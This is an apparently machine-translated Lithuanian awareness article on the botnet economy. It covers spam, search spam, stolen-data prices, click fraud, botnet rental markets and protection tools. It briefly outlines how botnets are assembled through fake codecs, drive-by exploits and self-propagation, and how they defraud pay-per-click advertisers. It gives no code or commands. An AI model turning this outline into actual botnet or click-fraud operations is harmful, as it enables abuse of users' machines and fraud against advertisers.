Milijonai šlamšto žinučių kasdien cirkuliuoja visame pasaulyje. Nepageidaujamų laiškų siuntimas yra viena iš pagrindinių šiuolaikinių botnetų funkcijų. „Kaspersky Lab“ duomenimis, apie 80% viso šlamšto siunčiama per zombių tinklus. Milijardai laiškų, reklamuojančių „Viagrą“, brangių laikrodžių kopijos, internetiniai kazino ir kt., siunčiami iš įstatymus paisančių vartotojų kompiuterių, kemšančių komunikacijos kanalus ir pašto dėžutes. Tokiu būdu įsilaužėliai kelia pavojų nekaltų vartotojų kompiuteriams: adresai, iš kurių siunčiami laiškai, patenka į antivirusinių kompanijų juoduosius sąrašus.

Pastaraisiais metais išsiplėtė ir pačių šiukšlių paslaugų mastas: atsirado ICQ šlamštas, šlamštas socialiniuose tinkluose, forumuose, tinklaraščiuose. Ir tai yra ir botnetų savininkų „nuopelnas“: juk visai nesunku prie boto kliento pridėti papildomą modulį, kuris atveria horizontus naujam verslui su tokiais šūkiais kaip „Spam on Facebook“. Nebrangus." Šlamšto kainos skiriasi priklausomai nuo tikslinės auditorijos ir adresų, kuriais siunčiamas laiškas, skaičiaus. Tikslinių siuntų kainos svyruoja nuo 70 USD už šimtus tūkstančių adresų iki 1 000 USD už kelias dešimtis milijonų adresų. Per praėjusius metus el. laiškų siuntėjai uždirbo apie 780 mln. USD.

Kuriamas paieškos šlamštas

Kitas „botnetų“ naudojimo atvejis – padidinti svetainių populiarumą paieškos sistemose. Dirbdami su paieškos sistemų optimizavimu, išteklių administratoriai stengiasi padidinti svetainės poziciją paieškos rezultatuose, nes kuo ji aukštesnė, tuo daugiau lankytojų į svetainę ateis per paieškos sistemas, taigi, tuo didesnės svetainės savininko pajamos, pvz. nuo reklamos ploto internetiniuose puslapiuose pardavimo. Daugelis įmonių moka žiniatinklio valdytojams daug pinigų, kad jų svetainė užimtų aukščiausias pozicijas paieškos sistemose. „Botnet“ savininkai pasinaudojo kai kuriomis jų technikomis ir automatizavo paieškos sistemos optimizavimo procesą.

Kai savo įrašo „LiveJournal“ komentaruose ar nuotraukų talpinimo svetainėje patalpintą sėkmingą nuotrauką pamatysite daugybę nuorodų, kurias sukūrė jums nepažįstamas asmuo, o kartais ir jūsų „draugas“, nenustebkite: kažkas tiesiog įsakė reklamuoti savo išteklius savininkų botnetui. Specialiai sukurta programa atsisiunčiama į zombių kompiuterį ir jos savininko vardu palieka komentarus apie populiarius išteklius su nuorodomis į reklamuojamą svetainę. Vidutinė nelegalių paieškos šlamšto paslaugų kaina yra apie 300 USD per mėnesį.

Kiek kainuoja asmens duomenys?

Pavogtų asmens duomenų kaina tiesiogiai priklauso nuo šalies, kurioje gyvena jų teisėtas savininkas. Pavyzdžiui, pilni JAV gyventojo duomenys kainuoja 5-8 dolerius. Juodojoje rinkoje ypač vertingi Europos Sąjungos gyventojų duomenys – jie du tris kartus brangesni nei JAV ir Kanados piliečių duomenys. Tai galima paaiškinti tuo, kad tokiais duomenimis gali naudotis bet kurios ES šalies nusikaltėliai. Vidutinė kaina visame pasaulyje už visą duomenų apie vieną asmenį paketą yra apie 7 USD.

Deja, nusprendusiems botnetą organizuoti nuo nulio, nebus sunku internete rasti instrukcijas, kaip sukurti zombių tinklą. Pirmas žingsnis: sukurkite naują zombių tinklą. Norėdami tai padaryti, turite užkrėsti vartotojų kompiuterius specialia programa - robotu. Užsikrėtimui naudojami šlamšto laiškai, žinučių talpinimas forumuose ir socialiniuose tinkluose bei kitos technikos; Dažnai robotas turi savaiminio dauginimosi funkciją, pavyzdžiui, virusus ar kirminus.

Socialinės inžinerijos metodai naudojami siekiant priversti potencialią auką įdiegti robotą. Pavyzdžiui, jie siūlo pažiūrėti įdomų vaizdo įrašą, kuriam reikia atsisiųsti specialų kodeką. Atsisiuntę ir paleidę tokį failą, vartotojas, žinoma, negalės žiūrėti jokio vaizdo įrašo ir greičiausiai nepastebės jokių pakeitimų, o jo kompiuteris bus užkrėstas ir taps paklusniu tarnu, vykdančiu visas komandas. botneto savininko.

Antrasis plačiai naudojamas robotų užkrėtimo būdas yra atsisiuntimas pagal diską. Kai vartotojas apsilanko užkrėstame tinklalapyje, kenkėjiškas kodas atsisiunčiamas į jo kompiuterį per įvairias programų „skyles“ – pirmiausia populiariose naršyklėse. Silpnoms vietoms išnaudoti naudojamos specialios programos – eksploatai. Jie leidžia ne tik tyliai atsisiųsti, bet ir tyliai paleisti virusą ar robotą. Šio tipo kenkėjiškų programų platinimas yra pats pavojingiausias, nes įsilaužus į populiarų šaltinį, užsikrės dešimtys tūkstančių vartotojų!

Botas gali turėti savaiminio dauginimosi kompiuterių tinklais funkciją. Pavyzdžiui, jis gali plisti užkrėsdamas visus turimus vykdomuosius failus arba tinkle ieškodamas ir užkrėsdamas pažeidžiamus kompiuterius.

Botneto kūrėjas gali valdyti užkrėstus nieko neįtariančių vartotojų kompiuterius naudodamas botnet komandų centrą, bendraudamas su robotais per IRC kanalą, interneto ryšį ar bet kokiomis kitomis prieinamomis priemonėmis. Pakanka į tinklą sujungti kelias dešimtis mašinų, kad botnetas pradėtų nešti pajamas savo savininkui. Be to, šios pajamos tiesiškai priklauso nuo zombių tinklo stabilumo ir jo augimo tempo.

Internetinės reklamos įmonės, veikiančios pagal PPC (Pay-per-Click) schemą, moka pinigus už unikalius internete paskelbtų skelbimų nuorodų paspaudimus. Botnetų savininkams tokių įmonių apgaudinėjimas yra pelningas verslas. Pavyzdžiui, galite naudoti gerai žinomą „Google AdSense“ tinklą. Į jį įtraukti reklamuotojai moka „Google“ už paskelbtų skelbimų paspaudimus, tikėdamiesi, kad užsukęs vartotojas ką nors iš jų nusipirks.

„Google“ savo ruožtu pateikia kontekstinę reklamą įvairiose „AdSense“ programoje dalyvaujančiose svetainėse, sumokėdama svetainės savininkui tam tikrą procentą už kiekvieną paspaudimą. Deja, ne visi svetainių savininkai yra sąžiningi. Naudodamas zombių tinklą, įsilaužėlis gali sugeneruoti tūkstančius unikalių paspaudimų per dieną, po vieną iš kiekvieno įrenginio, nesukeldamas didelio „Google“ įtarimo. Taigi reklaminei kampanijai išleisti pinigai nukeliaus į įsilaužėlio kišenę. Deja, dar nebuvo nė vieno atvejo, kad kas nors būtų patrauktas atsakomybėn už tokius veiksmus. „Click Forensics“ duomenimis, 2008 metais apie 16-17% visų reklamos nuorodų paspaudimų buvo netikri, iš kurių mažiausiai trečdalį sugeneravo botnetai. Atlikus paprastus skaičiavimus galima suprasti, kad pernai botnetų savininkai „išgrėbė“ 33 000 000 USD. Geros pajamos iš pelės paspaudimų!

Užpuolikai ir nesąžiningi verslininkai nebūtinai turi patys sukurti botnetą nuo nulio. Jie gali nusipirkti arba išsinuomoti įvairaus dydžio ir našumo botnetus iš įsilaužėlių – pavyzdžiui, kreipdamiesi į specializuotus forumus.

Baigto botneto kaina, taip pat jo nuomos kaina tiesiogiai priklauso nuo į jį įtrauktų kompiuterių skaičiaus. Paruošti botnetai yra populiariausi anglų kalbos forumuose.

Maži robotų tinklai, susidedantys iš kelių šimtų robotų, kainuoja nuo 200 iki 700 USD. Tuo pačiu metu vidutinė vieno boto kaina yra maždaug 50 centų. Didesni botnetai kainuoja daugiau pinigų.

Zombių tinklas „Shadow“, kurį prieš keletą metų sukūrė 19-metis įsilaužėlis iš Olandijos, susidėjo iš daugiau nei 100 tūkstančių visame pasaulyje esančių kompiuterių ir buvo parduotas už 25 000 eurų. Už šiuos pinigus galite nusipirkti nedidelį namą Ispanijoje, tačiau nusikaltėlis iš Brazilijos nusprendė įsigyti robotų tinklą.

„Botnet“ apsaugos įrankiai

1. Visų pirma, tai yra antivirusinės programos ir išsamūs apsaugos nuo interneto grėsmių paketai su reguliariai atnaujinamomis duomenų bazėmis. Jie padės ne tik laiku aptikti pavojų, bet ir jį pašalinti, kol jūsų ištikimasis „geležinis draugas“, paverstas zombiu, nepradės siųsti šlamšto ar „nuleisti“ svetaines. Išsamiuose paketuose, tokiuose kaip „Kaspersky Internet Security 2009“, yra visas saugos funkcijų rinkinys, kurį galima valdyti naudojant bendrą komandų centrą.

Antivirusinis modulis nuskaito svarbiausias sistemos sritis fone ir stebi visus galimus virusų įsiveržimo kelius: el. pašto priedus ir potencialiai pavojingas svetaines.

Ugniasienė stebi keitimąsi duomenimis tarp asmeninio kompiuterio ir interneto. Ji tikrina visus iš interneto gaunamus arba į jį siunčiamus duomenų paketus ir, jei reikia, blokuoja tinklo atakas ir neleidžia slaptai siųsti privačių duomenų į internetą.

Šlamšto filtras apsaugo jūsų pašto dėžutę nuo reklaminių pranešimų įsiskverbimo. Jos užduotys taip pat apima sukčiavimo el. laiškų atpažinimą, kurių pagalba užpuolikai bando iš vartotojo išgauti informaciją apie jo prisijungimo prie internetinių mokėjimų ar banko sistemų kredencialus.

2. Reguliarūs operacinės sistemos, interneto naršyklių ir kitų programų atnaujinimai, kurių kūrėjai aptinka ir pašalina daugybę jų apsaugos spragų bei užpuolikų išnaudojamų trūkumų.

3. Specialios šifravimo programos apsaugos jūsų asmeninius duomenis, net jei botas jau įsiskverbė į kompiuterį, nes norėdamas jį pasiekti jis turės nulaužti slaptažodį.

4. Sveikas protas ir atsargumas. Jei norite apsaugoti savo duomenis nuo įvairių rūšių grėsmių, neturėtumėte atsisiųsti ir įdiegti neaiškios kilmės programų, neatidaryti archyvų su failais, nepaisant antivirusinių įspėjimų, lankytis svetainėse, kurias naršyklė pažymi kaip pavojingą ir pan.

Dėkojame Kaspersky Lab už pagalbą rengiant medžiagą